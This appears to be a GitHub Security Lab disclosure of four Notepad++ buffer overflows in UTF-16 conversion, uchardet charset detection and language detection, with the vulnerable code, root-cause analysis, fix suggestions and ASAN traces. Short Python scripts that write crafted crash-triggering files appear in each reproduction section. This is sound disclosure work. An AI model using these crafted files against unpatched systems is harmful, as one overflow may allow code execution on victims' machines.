August 21, 2023

GHSL-2023-112, GHSL-2023-102, GHSL-2023-103, GHSL-2023-092: Buffer Overflows in Notepad++ - CVE-2023-40031, CVE-2023-40036, CVE-2023-40164, CVE-2023-40166

Jaroslav Lobacevski

Coordinated Disclosure Timeline

Summary

Notepad++ reads and writes past the bounds of several buffers when opening a crafted file.

Product

Notepad++

Tested Version

v8.5.2

Details

Issue 1: Heap buffer write overflow in Utf8_16_Read::convert (GHSL-2023-112)

The Utf8_16_Read::convert function allocates a new buffer [1] for UTF16 to UTF8 conversion. It calculates the new buffer size assuming that, in the worst case, every two UTF16 encoded input bytes may need three UTF8 bytes [2]. However, when the input length is an odd number of bytes, which only happens with malformed input, the calculation undercounts. For example, in the PoC, when the second chunk of bytes is processed, len is set to 9 and newSize becomes 14 (9 + 9 / 2 + 1). After the first 8 input bytes are consumed ([3] and [4]), pCur has already advanced [5] by 12 elements in the 14-element m_pNewBuf array. Utf16_Iter::operator++ then consumes the 9th byte together with a 10th byte that lies beyond the input len. Because Notepad++ reads files in chunks, that 10th byte still falls inside a valid buffer, but it holds stale data from the previous chunk. Finally, at [5], three more bytes are written through pCur, overflowing the array.

...
        case uni16LE: {
            size_t newSize = len + len / 2 + 1; // [2]

            if (m_nAllocatedBufSize != newSize)
            {
                if (m_pNewBuf)
                    delete[] m_pNewBuf;
                m_pNewBuf = NULL;
                m_pNewBuf = new ubyte[newSize]; // [1]
                m_nAllocatedBufSize = newSize;
            }

            ubyte* pCur = m_pNewBuf;

            m_Iter16.set(m_pBuf + nSkip, len - nSkip, m_eEncoding);

            while (m_Iter16)
            {
                ++m_Iter16; // [3]
                utf8 c;
                while (m_Iter16.get(&c)) // [4]
                    *pCur++ = c; // [5]
            }
...

Since Utf16_Iter::read() always consumes two bytes, its validity operator should check that both the current byte and the next one lie before the end: operator bool() { return (m_pRead + 1 < m_pEnd) || (m_out1st != m_outLst); };
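The arithmetic above can be checked with a small model. The following Python sketch is not Notepad++ code: `new_buf_size` and `bytes_written` are hypothetical names, every 2-byte read is assumed to expand to the worst-case three UTF8 bytes, and the "loose" check (valid while at least one input byte remains) is an assumption about the original iterator inferred from the behavior described here.

```python
def new_buf_size(length: int) -> int:
    """Buffer size as computed at [2]: len + len / 2 + 1 (integer division)."""
    return length + length // 2 + 1


def bytes_written(length: int, strict_check: bool) -> int:
    """Count output bytes, assuming each 2-byte read emits 3 UTF8 bytes.

    strict_check=False: iterator stays valid while one input byte remains
                        (assumed original behavior).
    strict_check=True:  iterator requires two remaining bytes (suggested check).
    """
    pos = 0      # stands in for m_pRead
    written = 0  # stands in for pCur - m_pNewBuf

    def valid() -> bool:
        return (pos + 1 < length) if strict_check else (pos < length)

    while valid():
        pos += 2      # read() always consumes two input bytes
        written += 3  # worst case: three UTF8 bytes per code unit
    return written


if __name__ == "__main__":
    length = 9  # odd chunk length from the example above
    print("allocated:", new_buf_size(length))
    print("written, loose check:", bytes_written(length, strict_check=False))
    print("written, strict check:", bytes_written(length, strict_check=True))
```

With len set to 9, the model allocates 14 bytes, writes 15 under the loose check, and writes 12 under the strict one, which matches the overflow described above.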

Impact

This issue may lead to arbitrary code execution.

Resources

To reproduce the issue:

  1. Create a file with the following Python script:
    with open("poc", "wb") as f:
      f.write(b'\xfe\xff')
      f.write(b'\xff' * (128 * 1024 + 4 - 2 + 1))

  2. Make an ASAN build of Notepad++.

  3. Open the file in Notepad++ to hit the out-of-bounds access with ASAN.

The output when built with ASAN:

==8896==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x1281524e6472 at pc 0x7ff7308d686e bp 0x00a8c41da680 sp 0x00a8c41da680
WRITE of size 1 at 0x1281524e6472 thread T0
==8896==WARNING: Failed to use and restart external symbolizer!
    #0 0x7ff7308d686d in Utf8_16_Read::convert C:\npp\PowerEditor\src\Utf8_16.cpp:181
    #1 0x7ff730060498 in FileManager::loadFileData C:\npp\PowerEditor\src\ScintillaComponent\Buffer.cpp:1620
    #2 0x7ff73005620f in FileManager::loadFile C:\npp\PowerEditor\src\ScintillaComponent\Buffer.cpp:753
    #3 0x7ff7305729bd in Notepad_plus::doOpen C:\npp\PowerEditor\src\NppIO.cpp:422
    #4 0x7ff73051a68f in Notepad_plus::command C:\npp\PowerEditor\src\NppCommands.cpp:3931
    #5 0x7ff7304d8163 in Notepad_plus::process C:\npp\PowerEditor\src\NppBigSwitch.cpp:777
    #6 0x7ff7304eb383 in Notepad_plus_Window::runProc C:\npp\PowerEditor\src\NppBigSwitch.cpp:127
    #7 0x7ff7304eafa1 in Notepad_plus_Window::Notepad_plus_Proc C:\npp\PowerEditor\src\NppBigSwitch.cpp:84
    #8 0x7fffdb1e8230 in DispatchMessageW+0x740 (C:\WINDOWS\System32\USER32.dll+0x180018230)
    #9 0x7fffdb1e7cf0 in DispatchMessageW+0x200 (C:\WINDOWS\System32\USER32.dll+0x180017cf0)
    #10 0x7ff73091b3eb in wWinMain C:\npp\PowerEditor\src\winmain.cpp:720
    #11 0x7ff7312b0b71 in invoke_main D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:118
    #12 0x7ff7312b0a9d in __scrt_common_main_seh D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #13 0x7ff7312b095d in __scrt_common_main D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:330
    #14 0x7ff7312b0bed in wWinMainCRTStartup D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_wwinmain.cpp:16
    #15 0x7fffda4c26ac in BaseThreadInitThunk+0x1c (C:\WINDOWS\System32\KERNEL32.DLL+0x1800126ac)
    #16 0x7fffdbf2a9f7 in RtlUserThreadStart+0x27 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x18005a9f7)

0x1281524e6472 is located 0 bytes to the right of 2-byte region [0x1281524e6470,0x1281524e6472)
allocated by thread T0 here:
    #0 0x7ff731263623 in operator new[] D:\a\_work\1\s\src\vctools\asan\llvm\compiler-rt\lib\asan\asan_win_new_array_thunk.cpp:42
    #1 0x7ff7308d665a in Utf8_16_Read::convert C:\npp\PowerEditor\src\Utf8_16.cpp:168
    #2 0x7ff730060498 in FileManager::loadFileData C:\npp\PowerEditor\src\ScintillaComponent\Buffer.cpp:1620
    #3 0x7ff73005620f in FileManager::loadFile C:\npp\PowerEditor\src\ScintillaComponent\Buffer.cpp:753
    #4 0x7ff7305729bd in Notepad_plus::doOpen C:\npp\PowerEditor\src\NppIO.cpp:422
    #5 0x7ff73051a68f in Notepad_plus::command C:\npp\PowerEditor\src\NppCommands.cpp:3931
    #6 0x7ff7304d8163 in Notepad_plus::process C:\npp\PowerEditor\src\NppBigSwitch.cpp:777
    #7 0x7ff7304eb383 in Notepad_plus_Window::runProc C:\npp\PowerEditor\src\NppBigSwitch.cpp:127
    #8 0x7ff7304eafa1 in Notepad_plus_Window::Notepad_plus_Proc C:\npp\PowerEditor\src\NppBigSwitch.cpp:84
    #9 0x7fffdb1e8230 in DispatchMessageW+0x740 (C:\WINDOWS\System32\USER32.dll+0x180018230)
    #10 0x7fffdb1e7cf0 in DispatchMessageW+0x200 (C:\WINDOWS\System32\USER32.dll+0x180017cf0)
    #11 0x7ff73091b3eb in wWinMain C:\npp\PowerEditor\src\winmain.cpp:720
    #12 0x7ff7312b0b71 in invoke_main D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:118
    #13 0x7ff7312b0a9d in __scrt_common_main_seh D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #14 0x7ff7312b095d in __scrt_common_main D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:330
    #15 0x7ff7312b0bed in wWinMainCRTStartup D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_wwinmain.cpp:16
    #16 0x7fffda4c26ac in BaseThreadInitThunk+0x1c (C:\WINDOWS\System32\KERNEL32.DLL+0x1800126ac)
    #17 0x7fffdbf2a9f7 in RtlUserThreadStart+0x27 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x18005a9f7)

SUMMARY: AddressSanitizer: heap-buffer-overflow C:\npp\PowerEditor\src\Utf8_16.cpp:181 in Utf8_16_Read::convert
Shadow bytes around the buggy address:
  0x04cd7c51cc30: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa fd fd
  0x04cd7c51cc40: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa fd fd
  0x04cd7c51cc50: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa fd fd
  0x04cd7c51cc60: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x04cd7c51cc70: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
=>0x04cd7c51cc80: fa fa fd fd fa fa fd fd fa fa fd fd fa fa[02]fa
  0x04cd7c51cc90: fa fa fd fa fa fa fd fa fa fa 00 00 fa fa 04 fa
  0x04cd7c51cca0: fa fa 04 fa fa fa 01 fa fa fa 04 fa fa fa 01 fa
  0x04cd7c51ccb0: fa fa 01 fa fa fa 04 fa fa fa 00 fa fa fa 04 fa
  0x04cd7c51ccc0: fa fa 04 fa fa fa 04 fa fa fa 00 00 fa fa 04 fa
  0x04cd7c51ccd0: fa fa 04 fa fa fa 04 fa fa fa 04 fa fa fa 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
Address Sanitizer Error: Heap buffer overflow

CVE

Issue 2: Global buffer read overflow in CharDistributionAnalysis::HandleOneChar (GHSL-2023-102)

Notepad++ uses a diverged copy of the uchardet library. A crafted file causes a read past the bounds of a globally allocated buffer when the file is opened.

The array index order in [1] depends on the input file content and can exceed the size of the mCharToFreqOrder buffer, which leads to an out-of-bounds read. For example, in the PoC it is set to 5419, while mCharToFreqOrder (a pointer to the global array EUCTWCharToFreqOrder) holds only 5376 elements. Note that the index is checked against mTableSize [2] before the read. However, mTableSize for EUCTWCharToFreqOrder is declared as 8102, which is larger than the actual array, so the check does not prevent the overflow.

  //Feed a character with known length
  void HandleOneChar(const char* aStr, PRUint32 aCharLen)
  {
    PRInt32 order;

    //we only care about 2-bytes character in our distribution analysis
    order = (aCharLen == 2) ? GetOrder(aStr) : -1;

    if (order >= 0)
    {
      mTotalChars++;
      //order is valid
      if ((PRUint32)order < mTableSize) // [2]
      {
        if (512 > mCharToFreqOrder[order]) // [1] buffer read overflow
          mFreqChars++;
      }
    }
  }

This behavior has been fixed in the freedesktop.org uchardet.
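To see how the two PoC bytes produce index 5419 and why the check at [2] lets it through, the sketch below recomputes the numbers in Python. The `euctw_order` formula is recalled from the uchardet sources rather than quoted in this advisory, so treat it as an assumption; the helper names are hypothetical, and the table sizes are the ones stated above and in the ASAN report.

```python
ACTUAL_ELEMENTS = 5376  # real length of EUCTWCharToFreqOrder
DECLARED_SIZE = 8102    # mTableSize used by the check at [2]
ELEMENT_BYTES = 2       # ASAN reports a 2-byte read from a 10752-byte array


def euctw_order(data: bytes) -> int:
    """Assumed EUC-TW GetOrder: -1 unless the lead byte is at least 0xC4."""
    if data[0] >= 0xC4:
        return 94 * (data[0] - 0xC4) + data[1] - 0xA1
    return -1


def passes_declared_check(order: int) -> bool:
    """The check as written: compares against the declared table size."""
    return 0 <= order < DECLARED_SIZE


def inside_array(order: int) -> bool:
    """What the check would need to guarantee: the index is inside the array."""
    return 0 <= order < ACTUAL_ELEMENTS


def bytes_past_end(order: int) -> int:
    """Offset of the read relative to the end of the array, in bytes."""
    return (order - ACTUAL_ELEMENTS) * ELEMENT_BYTES


if __name__ == "__main__":
    order = euctw_order(b"\xfd\xde")  # the two bytes written by the PoC
    print(order, passes_declared_check(order), inside_array(order))
    print("bytes past end:", bytes_past_end(order))
```

Under these assumptions the PoC bytes map to 5419, which passes the declared-size check but lands 86 bytes past the end of the array, the same offset the ASAN report shows.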

Impact

The exploitability of this issue is not clear. Potentially it may be used to leak internal memory allocation information.

Resources

To reproduce the issue:

  1. Create a file with the following Python script:
    with open("poc", "wb") as f:
      f.write(b'\xfd\xde')

  2. Make an ASAN build or set a breakpoint at if (512 > mCharToFreqOrder[order]).

  3. Open the file to hit the breakpoint or the out-of-bounds access with ASAN.

The output when built with ASAN:

==13==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000005f4c16 at pc 0x000000589f61 bp 0x7ffde5e554c0 sp 0x7ffde5e554b8
READ of size 2 at 0x0000005f4c16 thread T0
SCARINESS: 24 (2-byte-read-global-buffer-overflow-far-from-bounds)
    #0 0x589f60 in HandleOneChar /src/notepad-plus-plus/PowerEditor/src/uchardet/CharDistribution.h:69:19
    #1 0x589f60 in nsEUCTWProber::HandleData(char const*, unsigned int) /src/notepad-plus-plus/PowerEditor/src/uchardet/nsEUCTWProber.cpp:70:31
    #2 0x57e75c in nsMBCSGroupProber::HandleData(char const*, unsigned int) /src/notepad-plus-plus/PowerEditor/src/uchardet/nsMBCSGroupProber.cpp:160:25
    #3 0x57aadf in nsUniversalDetector::HandleData(char const*, unsigned int) /src/notepad-plus-plus/PowerEditor/src/uchardet/nsUniversalDetector.cpp:214:34
    #4 0x5796a8 in uchardet_handle_data /src/notepad-plus-plus/PowerEditor/src/uchardet/uchardet.cpp:89:63

DEDUP_TOKEN: HandleOneChar--nsEUCTWProber::HandleData(char const*, unsigned int)--nsMBCSGroupProber::HandleData(char const*, unsigned int)
0x0000005f4c16 is located 86 bytes to the right of global variable 'EUCTWCharToFreqOrder' defined in '/src/notepad-plus-plus/PowerEditor/src/uchardet/EUCTWFreq.tab:62:22' (0x5f21c0) of size 10752
SUMMARY: AddressSanitizer: global-buffer-overflow /src/notepad-plus-plus/PowerEditor/src/uchardet/CharDistribution.h:69:19 in HandleOneChar
Shadow bytes around the buggy address:
  0x0000800b6930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800b6940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800b6950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800b6960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800b6970: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 f9
=>0x0000800b6980: f9 f9[f9]f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0000800b6990: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0000800b69a0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0000800b69b0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0000800b69c0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0000800b69d0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==13==ABORTING

CVE

Issue 3: Global buffer read overflow in nsCodingStateMachine::NextState (GHSL-2023-103)

Notepad++ uses a diverged copy of the uchardet library. A crafted file causes a read past the bounds of a globally allocated buffer when the file is opened.

The array index byteCls in [1] depends on the input file content and can exceed the size of the charLenTable buffer, which leads to an out-of-bounds read. For example, in the PoC it is set to 9, but charLenTable points to ISO2022JPCharLenTable, which contains only 8 elements.

  nsSMState NextState(char c) {
    //for each byte we get its class , if it is first byte, we also get byte length
    PRUint32 byteCls = GETCLASS(c);
    if (mCurrentState == eStart)
    {
      mCurrentBytePos = 0;
      mCurrentCharLen = mModel->charLenTable[byteCls]; // [1] buffer read overflow
    }

This behavior has been fixed in the freedesktop.org uchardet.
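One way to picture a defensive lookup is to validate the class index against the table length before using it. The Python sketch below models only that idea: `CHAR_LEN_TABLE` stands in for ISO2022JPCharLenTable with placeholder contents, `char_len_for_class` is a hypothetical helper, and none of this is claimed to be the upstream uchardet fix.

```python
from typing import Optional, Sequence

CHAR_LEN_TABLE = [0] * 8  # 8 entries as stated above; values are placeholders
ELEMENT_BYTES = 4         # ASAN reports a 4-byte read from a 32-byte table


def char_len_for_class(table: Sequence[int], byte_cls: int) -> Optional[int]:
    """Return the table entry, or None when byte_cls is out of range."""
    if 0 <= byte_cls < len(table):
        return table[byte_cls]
    return None  # caller would treat this as an error state


def bytes_past_end(byte_cls: int, table_len: int) -> int:
    """Offset of the read relative to the end of the table, in bytes."""
    return (byte_cls - table_len) * ELEMENT_BYTES


if __name__ == "__main__":
    print(char_len_for_class(CHAR_LEN_TABLE, 7))  # last valid class
    print(char_len_for_class(CHAR_LEN_TABLE, 9))  # class reached by the PoC
    print("bytes past end:", bytes_past_end(9, len(CHAR_LEN_TABLE)))
```

Index 9 in an 8-entry table of 4-byte values starts 4 bytes past the end, which agrees with the "4 bytes to the right" line in the ASAN report.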

Impact

The exploitability of this issue is not clear. Potentially it may be used to leak internal memory allocation information.

Resources

To reproduce the issue:

  1. Create a file with the following python script:
    with open("poc", "wb") as f:
      f.write(b'\x49\x7e\x7b')
    
  2. Make an ASAN build or set a conditional breakpoint at mCurrentCharLen = mModel->charLenTable[byteCls]; when byteCls == 9.

  3. Open the file to hit the breakpoint or out of bounds access with ASAN.

The output when built with ASAN:

==13==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000005f0184 at pc 0x00000057c32f bp 0x7ffcd9144950 sp 0x7ffcd9144948
READ of size 4 at 0x0000005f0184 thread T0
SCARINESS: 17 (4-byte-read-global-buffer-overflow)
    #0 0x57c32e in NextState /src/notepad-plus-plus/PowerEditor/src/uchardet/nsCodingStateMachine.h:72:25
    #1 0x57c32e in nsEscCharSetProber::HandleData(char const*, unsigned int) /src/notepad-plus-plus/PowerEditor/src/uchardet/nsEscCharsetProber.cpp:84:47
    #2 0x57ac88 in nsUniversalDetector::HandleData(char const*, unsigned int) /src/notepad-plus-plus/PowerEditor/src/uchardet/nsUniversalDetector.cpp:202:29
    #3 0x5796a8 in uchardet_handle_data /src/notepad-plus-plus/PowerEditor/src/uchardet/uchardet.cpp:89:63

DEDUP_TOKEN: NextState--nsEscCharSetProber::HandleData(char const*, unsigned int)--nsUniversalDetector::HandleData(char const*, unsigned int)
0x0000005f0184 is located 60 bytes to the left of global variable 'ISO2022KRSMModel' defined in '/src/notepad-plus-plus/PowerEditor/src/uchardet/nsEscSM.cpp:254:15' (0x5f01c0) of size 72
0x0000005f0184 is located 28 bytes to the left of global variable '<string literal>' defined in '/src/notepad-plus-plus/PowerEditor/src/uchardet/nsEscSM.cpp:206:3' (0x5f01a0) of size 12
  '<string literal>' is ascii string 'ISO-2022-JP'
0x0000005f0184 is located 4 bytes to the right of global variable 'ISO2022JPCharLenTable' defined in '/src/notepad-plus-plus/PowerEditor/src/uchardet/nsEscSM.cpp:199:23' (0x5f0160) of size 32
SUMMARY: AddressSanitizer: global-buffer-overflow /src/notepad-plus-plus/PowerEditor/src/uchardet/nsCodingStateMachine.h:72:25 in NextState
Shadow bytes around the buggy address:
  0x0000800b5fe0: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 00
  0x0000800b5ff0: 04 f9 f9 f9 f9 f9 f9 f9 00 04 f9 f9 00 00 00 00
  0x0000800b6000: 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
  0x0000800b6010: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
  0x0000800b6020: 00 00 00 00 04 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
=>0x0000800b6030:[f9]f9 f9 f9 00 04 f9 f9 00 00 00 00 00 00 00 00
  0x0000800b6040: 00 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
  0x0000800b6050: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 04 f9
  0x0000800b6060: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 04 f9 f9
  0x0000800b6070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800b6080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==13==ABORTING

CVE

Issue 4: Heap buffer read overflow in FileManager::detectLanguageFromTextBegining (GHSL-2023-092)

When opening a file, Notepad++ calls FileManager::loadFile, which allocates a fixed-size buffer:

char* data = new char[blockSize + 8]; // +8 for incomplete multibyte char
...
bool res = loadFileData(doc, fileSize, backupFileName ? backupFileName : fullpath, data, &UnicodeConvertor, loadedFileFormat);
delete[] data;

FileManager::loadFileData loads the first block of data into the buffer [1] and calls detectLanguageFromTextBegining to identify the content type from the beginning of the file [2].

lenFile = fread(data + incompleteMultibyteChar, 1, blockSize - incompleteMultibyteChar, fp) + incompleteMultibyteChar; // [1]
if (ferror(fp) != 0)
{
    success = false;
    break;
}
if (lenFile == 0) break;
...
fileFormat._language = detectLanguageFromTextBegining((unsigned char *)data, lenFile); // [2]

FileManager::detectLanguageFromTextBegining advances an index into data until a non-space character is found or lenFile is reached [3]. In the latter case it does not stop: it goes on to copy 40 bytes starting at the end of the loaded data, which reads 32 bytes (40 - 8, where 8 is the extra padding added for the incomplete multibyte character case) past the end of the data buffer [4].

LangType FileManager::detectLanguageFromTextBegining(const unsigned char *data, size_t dataLen)
{
...
// Skip any space-like char
for (; i < dataLen; ++i) // [3]
{
    if (data[i] != ' ' && data[i] != '\t' && data[i] != '\n' && data[i] != '\r')
        break;
}

// Create the buffer to need to test
const size_t longestLength = 40; // shebangs can be large
std::string buf2Test = std::string((const char*)data + i, longestLength); // [4]   OOB READ

After the loop, the code should check that i + longestLength does not exceed dataLen before constructing the string.
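The size of the over-read follows directly from the buffer arithmetic. The Python sketch below models it with the numbers from this section; it assumes blockSize equals 128 * 1024 + 4 (the file length used in the reproduction script), and `overread_bytes` and `clamped_length` are hypothetical helpers that illustrate one possible guard, not the actual patch.

```python
BLOCK_SIZE = 128 * 1024 + 4  # assumed blockSize, taken from the PoC file length
PADDING = 8                  # extra bytes allocated for incomplete multibyte chars
LONGEST_LENGTH = 40          # longestLength in detectLanguageFromTextBegining


def skip_whitespace(data: bytes) -> int:
    """Mirror the loop at [3]: index of the first non-space-like byte."""
    i = 0
    while i < len(data) and data[i] in b" \t\n\r":
        i += 1
    return i


def overread_bytes(i: int, alloc_size: int, want: int = LONGEST_LENGTH) -> int:
    """Bytes read past the allocation when copying `want` bytes from offset i."""
    return max(0, i + want - alloc_size)


def clamped_length(i: int, data_len: int, want: int = LONGEST_LENGTH) -> int:
    """One possible guard: never copy more than what remains in the data."""
    return min(want, data_len - i)


if __name__ == "__main__":
    data = b" " * BLOCK_SIZE  # same content as poc.xml
    i = skip_whitespace(data)
    print("index after loop:", i)
    print("over-read:", overread_bytes(i, BLOCK_SIZE + PADDING))
    print("clamped copy length:", clamped_length(i, len(data)))
```

For a file made entirely of spaces the loop ends with i equal to dataLen, the unguarded copy runs 32 bytes past the allocation, and the clamped length is 0.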

Impact

The exploitability of this issue is not clear. Potentially it may be used to leak internal memory allocation information.

Resources

To reproduce the issue:

  1. Enable page heap for notepad++.exe in GFlags.

  2. Create a poc.xml with the following python script:
    with open("poc.xml", "w") as f:
      f.write(" " * (128 * 1024 + 4))

  3. Open the file with notepad++ to trigger the memory read exception.

CVE

Credit

These issues were discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2023-092, GHSL-2023-102, GHSL-2023-103 or GHSL-2023-112 in any communication regarding these issues.